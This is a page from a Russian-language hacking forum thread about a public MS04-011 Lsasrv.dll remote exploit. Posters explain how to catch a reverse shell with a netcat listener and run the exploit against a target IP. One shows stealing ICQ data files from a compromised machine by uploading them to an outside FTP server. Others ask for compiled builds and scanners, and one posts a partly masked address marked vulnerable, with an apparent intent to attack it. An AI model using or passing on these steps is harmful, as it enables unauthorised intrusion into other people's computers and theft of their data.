Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 3 4 5 6 7 ... 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
Цитата

Люди, кто умееет программировать и кому не жалко своего
времени а так же жаба не задушит потом делиться ...
добишите, пожалуйста, код, чтобы можно было указывать еще
изходящий порт для бэк шела =)

в случае с reverse shell'ом:
bind port это и есть connectback port, т.е. порт на котором
ты слушаешь (принимаешь соединение).

Пример:
C:\nc.exe -l -p 1234 -vv (ждем соединение на порт 1234)

C:\expl.exe 1 targetIP 1234 myIP

и еще, не забывайте про опцию -t которая позволяет узнать
версию удаленной системы.

Пример:
C:\expl.exe 0 targetIP 1234 -t
...
[*] Detecting remote OS: Windows 5.0
удаленная система - Win2k (*), поэтому
пробуем таргет 1, но уже без опции -t

C:\expl.exe 1 targetIP 1234
...

(*) Windows 5.0 - Win2k
    Windows 5.1 - WinXP
 
Цитата
Гость пишет:
Ребята,а как через телнет файлы качать?

--
ну вот ... приехали:
на уд тачке:
ftp> open site.by.ru
Связь с site.by.ru.
220-Welcome to Pure-FTPd.
220-You are user number 17 of 100 allowed.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 10 minutes of inactivity.
Пользователь (site.by.ru:(none)): site
331 User site OK. Password required
Пароль:
230-Your bandwidth usage is restricted
230-User site has group access to:  own
230-OK. Current restricted directory is /
230 2 files used (0%) - authorized: 10000 files
ftp> put /c:\progra~1\icq\2000b\*.dat

--
могу чего-нибудь напутать...
 
Блин запарился я с этим сплоитом мож готовый ктонить выкинет ....???
 
Цитата
houseofdabus пишет:
Цитата
 
Люди, кто умееет программировать и кому не жалко своего  
времени а так же жаба не задушит потом делиться ...  
добишите, пожалуйста, код, чтобы можно было указывать еще  
изходящий порт для бэк шела =)
   
а чтобы выбирать еще исходящий порт, нужно переделать
reverse shell. Если у меня будет желание делать версию 0.2
(что врядли), то я добалю такой reverse shell.
 
2 > houseofdabus
Принято.
=)
Хотелось вот чего:
возможность указывать с КАКОГО порта на targetIP будет поступать соединение на мой connectback port прослушиваемый nc.
 
да ... ключик -t может помочь
 
мож кто сканер дописал я чет немогу втыкнуть
иль хотяб наброски кто нить может дать?
 
2 houseofdabus
Самим можно дописать... если такая -уж охота...
я лично думал нафиг продолжения писать, всё что надо уже есть.. ну почти все :)
 
дайте плиз откомпиленную версию simpler2004@mail.ru
 
Цитата
^n0th1ng^ пишет:
2 houseofdabus
Самим можно дописать... если такая -уж охота...
я лично думал нафиг продолжения писать, всё что надо уже есть.. ну почти все :)
согласен ... и этого для паблика с лихвой =)
но возможность биндить и сходящий на таргете тож может пригодиться
 
lexus:
дайте плиз откомпиленную версию simpler2004@mail.ru
--
а чё тебе ещё дать?
 
eUripID
--
впринципе да....
 
Цитата
Гость пишет:
мож кто сканер дописал я чет немогу втыкнуть
иль хотяб наброски кто нить может дать?

сканер уже есть и давно (с момента публикации о уязвимости)
 
scanner можно на перле прикрутить (445 port)
 
АУУУУ....как с тельнета файлы качать????????????????
 
Цитата
Гость пишет:
АУУУУ....как с тельнета файлы качать????????????????

тебе уже ответили ... (смотри выше)
 
DSSCAN:
http://www.foundstone.com/resources/termsofuse.htm?file=dssc an.zip
 
перцы с суперсканом помогли с тулзой вот! см. выше
 
Цитата
^n0th1ng^ пишет:
DSSCAN:
http://www.foundstone.com/resources/termsofuse.htm?file=dssc an.zip

именно!
 
80.237.XXX.174,"ppp174-XXX.net.XXX.ru","USER-9T7UKEUZHC","VU LNERABLE"
--
расколбасно ... да впринципе в моём сегменте и не чешуться багу закрывать... надо помочь :)
Страницы: Пред. 1 ... 3 4 5 6 7 ... 19 След.
Читают тему